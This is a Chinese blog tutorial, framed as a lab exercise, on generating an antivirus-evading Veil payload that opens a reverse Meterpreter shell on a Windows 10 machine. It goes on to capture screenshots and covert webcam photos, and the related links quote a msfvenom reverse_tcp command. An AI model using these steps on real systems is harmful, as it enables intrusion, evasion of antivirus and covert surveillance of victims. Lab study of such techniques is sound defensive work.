Veil生成免杀payload 渗透win10 获取靶机shell

最新推荐文章于 2022-03-28 21:23:48 发布
最新推荐文章于 2022-03-28 21:23:48 发布
阅读量1.8k 收藏 36
点赞数 2
分类专栏: 渗透精华 文章标签: Veil免杀 控制目标摄像头 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40624810/article/details/98466812
版权

一:实验环境

两台机器处于同网段

攻击机:kali 192.168.115.134 

靶机:win10 192.168.115.1

二:Veil下载、安装、使用

kali里默认没有安装Veil,我们通过命令行安装:

 apt-get update && apt-get install veil

安装过程有点漫长,如果用的国内源可能会快点。

安装完成后启动Veil

 

关于用法上述图片英文写的很明白

这里我们使用1) Evasion

list列出可用的有效载荷

payload共有41种,这里我选择 13号的cs/shellcode_inject/virtual.py
 

进行演示! 从上面可以清楚看到11号payload有很多选项,在这个界面,我们可以对该 payload 进行一些基本的配置。

然后运行"generate"生成有效载荷,我们选择4带有shellcode的有效载荷。这里会要求输入本机的IP:192.168.115.134和该payload使用的端口,我们设置为9999端口

下图可以看到成功完成以上编译后,编译后的文件被保存在 /var/lib/veil/output/compiled/uzi.exe
下。同时新生成的 shellcode 的 rc 文件也被保存在了 /var/lib/veil/output/handlers/uzi.rc下!既然有了 rc 文件,那么我们就可以方便的利用 MSF 进行调用了

在生成的 shellcode 的 rc 文件目录下运行

msfconsole -r uzi.rc

通过session -i发现并未有连接建立这是因为我们的shellcode文件还没运行。在靶机运行我们的shellcode文件前,来个小插曲我们用360检验下它看能否免杀。

结果显示360杀毒并未进行查杀,所以我们绕过了杀毒软件。然后在靶机运行该.exe程序。kali立马监测到连接建立。输入sessions -i发现ID为1的连接建立

运行sessions -i 1与ID为1的连接会话获取靶机的shell

然后我们就可以实现一些操作比如,获取靶机,屏幕截图,用靶机的摄像头,拍摄照片,键盘监听文件上传等。我在这里演示其中两个:

用screenshot命令获取靶机屏幕截图,然后保存在下图所示目录

我们用命令行查看下图片

root@kali:~# dislpay /var/lib/veil/output/handlers/QRFWNXhM.jpeg

 

下面来点更刺激的,用靶机的摄像头拍摄照片

命令是:

meterpreter > webcam_snap

 

输入命令查看

root@kali:~# display /var/lib/veil/output/handlers/leUhWlQC.jpeg

本人太丑所以用可爱的小兔兔代替了。

更多操作参考:https://blog.csdn.net/nzjdsds/article/details/77916706

本教程仅供学习交流

 

qq_40624810
关注
  • 2
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
漏洞payload 靶机_微软SMB远程代码执行漏洞复现
weixin_28801659的博客
01-07 566
漏洞描述微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaCry等勒索蠕虫利用的可能,攻击者可以构造特定的网页、压缩包、共享目录、Office...
【原创】利用Office宏实现powershell payload远控
weixin_30436101的博客
03-31 217
  本文将演示使用Veil-Evasion生成远控所需要的payload以及监听器,然后使用MacroShop生成payload 相关的VBA代码,最后演示将VBA代码写入.doc文本文档的宏中。   环境:虚拟机_Kali   依赖:Veil-Evasion、MacroShop 0x00 安装Veil-Evasion、MacroSh...
免杀Payload生成工具Veil的下载与使用
Goodric的博客
03-28 3763
免杀Payload生成工具Veil的下载与使用 Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件 ———— ———— 下载Veil kali 中输入指令 apt-get install veil 下载 veil(需要挺久) 下载可能会出现错误,我这里提示了可能解决问题的指令。其它问题无法下载也可能需要换软件源。 我这里页面显示这个,大概是说升级了libpam、libc、libssl等exe库,需要重新启动服务,就直接选Yes 了。
Kail Linux渗透测试教程之免杀Payload生成工具Veil
09-01 498
Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具——Veil Kail Linux渗透测试教程之免杀Payload生成工具VeilVeil是一款利用...
Veil免杀payload生成工具
阿金正传
04-06 3954
转自 Linux折腾笔记 下载安装    git clone https://github.com/veil-evasion/Veil.git    cd Veil/setup/    ./setup.sh  也可以下载zip包,然后解压安装:https://github.com/veil-evasion/Veil 一路回车:
免杀工具--veil-evasion
11-21
3. **自动化流程**:Veil-Evasion提供了一种自动化的方式,使得生成免杀payload(有效载荷)的过程更为简便,减少了手动操作的复杂性。 4. **多种攻击载体**:支持创建各种类型的免杀payload,包括Windows可执行文件...
Veil-Evasion.7z
12-19
Veil-Evasion是一款开源的渗透测试工具,专为安全研究人员和道德黑客设计,用于创建和部署难以被防病毒软件检测到的payload。该工具的主要目标是帮助进行合法的安全测试,以便评估网络防御的有效性,而不是用于非法...
一壳过360免杀教程
04-11
【标题】"一壳过360免杀教程"指的是如何使用特定的技术手段来绕过360安全软件的检测,使恶意软件或病毒能够不被发现并执行。这里的"一壳"通常指的是对程序进行加壳,即将原始程序包裹在另一层代码中,以隐藏其真实...
VeilDenpendenices for Veil
最新发布
10-25
5. **Payload生成**:Veil依赖于各种payload生成技术,如Meterpreter、Empire等,理解这些payload的工作原理和用途对于有效使用Veil至关重要。 6. **网络通信**:Veil可能依赖于HTTP、HTTPS或者其他协议进行通信,...
Veil-Evasion-master.zip
04-03
Veil-Evasion的主要目的是帮助安全研究人员和渗透测试人员创建能够绕过常见防病毒软件和安全解决方案的恶意软件payload。这个工具的出现使得合法的安全测试过程能够更加隐蔽,从而有效地模拟黑客攻击行为,检测组织...
kali渗透测试win10
舌耳的博客
10-29 1万+
通过msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe 把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接 在kali中 msfconsole msf > use exploit/multi/handler msf exp...
Metasploit渗透测试学习笔记——7、使用Metasploit生成各种payload
Fly_鹏程万里
05-23 2817
前言在metasploit中,往往一个最有用的(初学者低估)功能模块是Metasploit的msfpayload模块。这个模块可以创建多个有效载荷,它可以帮助在任何情况下给你一个shell。对于每一个这些有效载荷可以进入msfconsole选择合理的利用,运行“设置有效载荷的必要选项(LHOST,LPORT,等),执行并等待要运行的有效负载。下面我们开始今天的介绍吧,我觉得每一个喜欢metaspl...
免杀测试】Kali之Metasploit几款工具免杀练习
朔方飞絮谈安全
01-11 1万+
余磊  不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。 下面就尝试测试有关工具的免杀效果,三款工具为,shellter,Veil,  Avet 01 shellter Shellter采用了动
payload是什么?
热门推荐
az44yao的专栏
03-12 7万+
payload是一种以JSON格式进行数据传输的一种方式。 http可能会传输payload,如果不限制其请求的方式(那么请求的方法就是OPTIONS)或者响应的状态码,其包含元数据,头部区域和数据。 如果数据是通过正常的put或者post方法发送的,那么payload就是一个http请求起始行紧接一个CRLF后面的那一部分。 起始行:POST /getProduct HTTP/1.1 首...
2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践
weixin_34266504的博客
03-31 163
2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 1. 使用msf编码器生成各种后门程序及检测 msf编码器是非常实用的,但是我的实践表明,直接实用msf生成后门(exe文件)是不容易躲过杀毒的,因此我认...
靶机渗透测试实战(十)——SickOs1.2渗透实战
橘子女侠
05-11 4279
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访...
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1048
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
远控免杀从入门到实践(6)-代码篇-Powershell
weixin_46236101的博客
03-13 1077
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
漏洞payload 靶机_kali渗透综合靶机(十六)--evilscience靶机
weixin_34239718的博客
12-23 453
kali渗透综合靶机(十六)--evilscience靶机一、主机发现1.netdiscover -i eth0 -r 192.168.10.0/24二、端口扫描1. masscan --rate=10000 -p0-65535 192.168.10.195三、端口服务识别1. nmap -sV -T4 -O -p 22,80 192.168.10.195四、漏洞查找与利用1.目录扫描2. 发现h...
21.远控免杀专题(21)-HERCULES免杀(VT免杀率29-70)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本专题文章导航免杀能力一览表一、H

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值